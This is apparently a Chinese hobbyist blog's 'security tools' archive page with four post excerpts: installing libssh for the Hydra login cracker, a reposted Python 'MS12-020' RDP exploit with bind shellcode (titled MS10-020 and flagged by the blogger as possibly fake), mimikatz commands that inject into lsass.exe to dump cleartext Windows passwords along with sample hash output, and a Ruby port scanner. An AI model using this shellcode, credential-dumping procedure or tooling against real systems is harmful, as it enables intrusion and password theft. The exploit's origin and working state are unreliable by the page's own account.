存档

‘安全工具’ 分类的存档

Hydra安装Libssh模块

2013年1月15日 7 条评论

Hydra是一个支持多种网络服务的非常快速的网络登陆破解工具。这个工具是一个验证性质的工具,它被设计的主要目的是为了研究人员和安全从业人员对网络服务进行弱密码探测!

最新发布版本:hydra-7.4.2.tar.gz

当我们使用hydra来探测远程ssh服务口令是否强壮时,如果没有安装libssh模块,程序会给出如下一个错误:

[ERROR] Compiled without LIBSSH v0.4.x support, module is not available!

如何装libssh呢?方法如下:

方法一、支持apt-get的话

apt-get purge hydra
apt-get install cmake libssl-dev 阅读全文…

分类: 安全工具 标签:

MS10-020(RDP远程溢出EXP)

2012年3月15日 1 条评论

网上这个转的很厉害,不知真假,收藏先。

据说假的,FreeRDP这个模块…..

#!/usr/bin/env python
#############################################################################
#   MS12-020 Exploit
#
#   Uses FreeRDP
#############################################################################
import struct
import sys
from freerdp import rdpRdp
from freerdp import crypto
from freerdp.rdpRdp import  rdpNego
#bind shellcode TCP port 4444
shellcode  = '\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90'
shellcode += '\x29\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\xe9'
shellcode += '\x4a\xb6\xa9\x83\xee\xfc\xe2\xf4\x15\x20\x5d\xe4\x01\xb3\x49\x56'
shellcode += '\x16\x2a\x3d\xc5\xcd\x6e\x3d\xec\xd5\xc1\xca\xac\x91\x4b\x59\x22'
shellcode += '\xa6\x52\x3d\xf6\xc9\x4b\x5d\xe0\x62\x7e\x3d\xa8\x07\x7b\x76\x30'
shellcode += '\x45\xce\x76\xdd\xee\x8b\x7c\xa4\xe8\x88\x5d\x5d\xd2\x1e\x92\x81'
shellcode += '\x9c\xaf\x3d\xf6\xcd\x4b\x5d\xcf\x62\x46\xfd\x22\xb6\x56\xb7\x42'
shellcode += '\xea\x66\x3d\x20\x85\x6e\xaa\xc8\x2a\x7b\x6d\xcd\x62\x09\x86\x22'
shellcode += '\xa9\x46\x3d\xd9\xf5\xe7\x3d\xe9\xe1\x14\xde\x27\xa7\x44\x5a\xf9'
shellcode += '\x16\x9c\xd0\xfa\x8f\x22\x85\x9b\x81\x3d\xc5\x9b\xb6\x1e\x49\x79'
shellcode += '\x81\x81\x5b\x55\xd2\x1a\x49\x7f\xb6\xc3\x53\xcf\x68\xa7\xbe\xab'
shellcode += '\xbc\x20\xb4\x56\x39\x22\x6f\xa0\x1c\xe7\xe1\x56\x3f\x19\xe5\xfa'
shellcode += '\xba\x19\xf5\xfa\xaa\x19\x49\x79\x8f\x22\xa7\xf5\x8f\x19\x3f\x48'
shellcode += '\x7c\x22\x12\xb3\x99\x8d\xe1\x56\x3f\x20\xa6\xf8\xbc\xb5\x66\xc1'
shellcode += '\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0'
shellcode += '\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe'
shellcode += '\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9'
shellcode += '\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84'
shellcode += '\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56'
shellcode += '\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8'
shellcode += '\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79'
shellcode += '\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6'
shellcode += '\xba\xb5\x60\x56\x39\x4a\xb6\xa9'
#Payload

阅读全文…

分类: 安全工具 标签: ,

获取Windows系统明文密码神器

2012年2月22日 3 条评论

今日在群看到某牛发一链接,老外所书某文,介绍使用此器获取系统明文密码的一些方法,具体如下:

注:使用前需确定自身系统是x86还是x64

本人测试环境:windows 2003

密码长度:8位

进入文件所在目录,双击打开mimikatz.exe,按照以下步骤进行,

1、mimikatz # privilege::debug

2、mimikatz # inject::process lsass.exe sekurlsa.dll

3、mimikatz # @getLogonPasswords

Authentification Id : 0;434898
Package d’authentification : NTLM
Utilisateur principal : User
Domaine d’authentification : vm-w7-ult
msv1_0 : lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
wdigest : fuck1234
tspkg : fuck1234 这里就是密码
我测试的时候还能看到历史密码。比较牛x的神器!

经网络众人分析,支持系统如下:

Windows XP (部分可以)
Windows Server 2003
Windows Server 2008
Windows Vista
Windows 7
Windows 7 SP1 阅读全文…

分类: 安全工具 标签: ,

Linux下多线程扫描

2011年12月6日 4 条评论
#!/usr/bin/ruby -w
require 'socket'
include Socket::Constants

ports = (1..60000).to_a
threads = []
time1 = Time.now
for port in ports
  threads << Thread.new(port) do |theport|
    begin
      sock = Socket.new(AF_INET, SOCK_STREAM, 0)
      sockaddr = Socket.pack_sockaddr_in(theport, ARGV[0])
      sock.connect(sockaddr)
      puts "Port:#{theport} is Opend!\n"
      sock.close
    rescue
      #...
    end
  end
end
threads.each {|thr| thr.join}

puts "\n共耗时:#{Time.now - time1}秒"
分类: 安全工具 标签:
普人特福的博客cnzz&51la for wordpress,cnzz for wordpress,51la for wordpress